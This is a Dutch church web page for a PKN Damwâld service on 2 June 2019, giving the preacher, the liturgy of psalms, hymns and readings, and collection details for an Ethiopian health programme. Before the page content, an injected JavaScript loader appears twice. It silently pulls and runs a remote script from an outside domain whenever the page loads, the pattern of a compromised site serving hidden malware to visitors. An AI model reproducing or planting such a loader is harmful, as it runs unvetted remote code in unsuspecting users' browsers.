;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 2 juni 2019 14:00 uur - PKN Damwâld
zondag 2 juni 2019
14:00 uur

Kerkdienst zondag 2 juni 2019 14:00 uur

Thema: Zichtbaar?

Informatie

Voorganger:Ds. G. Oberink, Urk
Organist:Jelte Cuperus
Thema:Zichtbaar?
Liturgie
Lied voor de dienst : Elb 91
Welkom
Introlied Psalm 98 : 1
Stil Gebed, Votum en Groet
Introtekst Filippenzen 4 :9
We zingen: Psalm 98 : 2
Belijden 1 Apostolicum
We zingen: Psalm 98 : 3
Belijden 2 HC
We zingen: Psalm 98 : 4
Gebeden
We zingen: Elb 343
We lezen: Titus 1 : 4-9
We zingen: Gezang 252 : 1, 2
We lezen: Filippenzen 4 : 4-9
We zingen: Gezang 252 : 3 en 4
Preek Zichtbaar?
We zingen: Gezang 441 : 1, 2, 12
Dankgebed - Voorbeden
Collecte
Slotlied : ELb 140
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Ethiopië

Ethiopië - Gezondheidsprogramma in één van de armste gebieden.
(zie ook collecte 16 juni)
Circa tien jaar geleden waren er in de arme regio Benshangul-Gumuz nauwelijks voorzieningen op het gebied van gezondheidszorg. Onnodig veel kinderen overleden rond de geboorte, door ondervoeding of malaria. De laatste jaren is er gelukkig veel verbeterd, maar financiële steun blijft nodig.

Tweede collecte: Kerk
Uitganscollecte: Kerk